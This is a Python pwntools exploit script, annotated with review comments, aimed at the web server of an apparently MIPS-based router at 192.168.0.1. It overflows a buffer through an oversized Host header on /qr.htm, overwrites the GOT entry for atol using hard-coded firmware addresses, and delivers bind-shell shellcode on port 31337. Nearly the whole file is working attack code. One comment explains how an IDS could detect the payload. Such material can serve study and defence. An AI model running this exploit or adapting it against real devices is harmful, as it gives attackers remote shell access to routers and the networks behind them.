#!/usr/bin/python3
from pwn import *
import sys
import urllib.request
import urllib.parse
# pwntools global context: the target is 32-bit little-endian MIPS. asm() and
# shellcraft in shellcode() below derive their architecture from these values;
# the p32() calls in exploit() pass endian= explicitly and do not depend on it.
context.clear()
context.arch = 'mips'
context.bits = 32
context.endian = 'little'
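class WebService:
    """Minimal HTTP GET client for the target's web server.

    Every request is a plain GET built with urllib. The caller controls only
    the URL path, an optional query string and the raw value of the ``Host``
    header (plus an optional ``Content-Length: 0``).
    """

    def __init__(self, ip, port=80):
        """Store the base URL ``http://<ip>:<port>`` used by ``make_req``."""
        self.rooturl = "http://" + ip + ':' + str(port)

    def make_req(self, path, arg=None, host='192.168.0.1', has_ContentLength=False):
        """Send one GET request and return the raw response body.

        Args:
            path: URL path appended to the base URL (expected to start with ``/``).
            arg: optional mapping that is URL-encoded into the query string;
                ``None`` means no query string at all.
            host: value placed in the ``Host`` header. May be ``str`` or
                ``bytes`` -- callers in this file pass ``bytes``.
            has_ContentLength: when true, also send ``Content-Length: 0``.

        Returns:
            The response body as ``bytes``.

        Raises:
            urllib.error.URLError (or its HTTPError subclass) when the
            connection or the HTTP exchange fails.
        """
        headers = {'Host': host}
        if has_ContentLength:
            headers['Content-Length'] = '0'
        fullurl = self.rooturl + path
        if arg is not None:
            fullurl += '?' + urllib.parse.urlencode(arg)
        req = urllib.request.Request(fullurl, None, headers)
        # Use the response as a context manager so its socket is closed as
        # soon as the body is read; the original left that to the garbage
        # collector, leaking one connection per call until finalization.
        with urllib.request.urlopen(req) as response:
            return response.read()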
def shellcode(port=31337):
    """Assemble the pwntools MIPS/Linux ``bindsh`` payload for ``port``.

    ``shellcraft`` and ``asm`` come from the ``from pwn import *`` at the top
    of the file; the architecture is taken from the global ``context`` set
    above. Returns the assembled machine code as ``bytes``.
    """
    # NOTE(review): this local shadows the enclosing function's name; harmless
    # here, but it reads as if the function were calling itself.
    shellcode = shellcraft.mips.linux.bindsh(port)
    return asm(shellcode)
def exploit(ip):
    """Send the scripted request sequence to the hard-coded target.

    Args:
        ip: accepted from the command line but never used; the target
            address is fixed to ``target_ip`` below.
    """
    # NOTE(review): ``ip`` is ignored. The usage string in __main__ advertises
    # a "listen ip addr", yet nothing here consumes it and the payload built by
    # shellcode() is a bind shell, which needs no listener on this side.
    target_ip = '192.168.0.1'
    w = WebService(target_ip)
    # Absolute addresses are specific to one firmware build and are kept as
    # given in the original script. The variable name suggests the GOT slot
    # for atol(); the reason for the -4 adjustment is not explained here.
    atol_got_addr = 0x423774 - 4
    host_padding = b'a' * 512
    shellcode_addr = 0x438174
    print("[+] Sending exploit to ip:%s" % (target_ip))
    # Every request is a GET /qr.htm whose payload rides in the Host header.
    # Detection note: a Host header of several hundred repeated bytes followed
    # by binary data is a clear anomaly that web-server logs or an IDS can
    # flag; the fixed '/qr.htm' path and 'AAAA' filler are further markers.
    host_str = host_padding + b'AAAA' + p32(shellcode_addr, endian='little')
    w.make_req('/qr.htm', host=host_str)
    print("[+] Overflowing buffer")
    host_str = host_padding + p32(atol_got_addr, endian='little')
    w.make_req('/qr.htm', host=host_str)
    print("[+] Overwriting got entry")
    # Plain request with a throw-away query parameter between the two stages.
    w.make_req('/qr.htm', {'_':'hello'})
    host_str = b'q'*0x40 + shellcode(31337)
    w.make_req('/qr.htm', host=host_str)
    # Best-effort final request: presumably it is not expected to return a
    # normal response, so any exception is deliberately swallowed rather than
    # aborting the script.
    try:
        w.make_req('/qr.htm', has_ContentLength=True)
    except Exception:
        pass
    print("[+] Done!")
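if __name__ == '__main__':
    # Command-line entry point: exactly one positional argument is required.
    # It is forwarded to exploit(), which currently ignores it (the target
    # address is hard-coded there), so the usage text is misleading.
    if len(sys.argv) != 2:
        print('Usage: %s <listen ip addr>' % sys.argv[0])
        # sys.exit() rather than the site-module exit() builtin, which is
        # intended for interactive use and is absent under ``python -S``.
        sys.exit()
    exploit(sys.argv[1])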